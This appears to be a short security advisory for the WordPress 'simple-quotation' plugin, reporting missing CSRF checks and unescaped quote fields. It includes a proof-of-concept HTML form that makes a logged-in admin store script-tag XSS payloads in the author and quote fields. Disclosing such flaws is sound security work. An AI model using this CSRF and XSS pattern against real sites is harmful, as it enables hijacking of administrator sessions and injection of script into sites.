The plugin does not have CSRF check when creating or editing a quote and does not sanitise and escape Quotes. As a result, attacker could make a logged in admin create or edit arbitrary quote, and put Cross-Site Scripting payloads in them
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=simple-quotation/simple-quotation.php" method="POST">
<input type="hidden" name="author" value="<script>alert(/XSS-image/)</script>" />
<input type="hidden" name="newquotes" value="<script>alert(/XSS-quote/)</script>" />
<input type="hidden" name="add" value="Add the quote" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>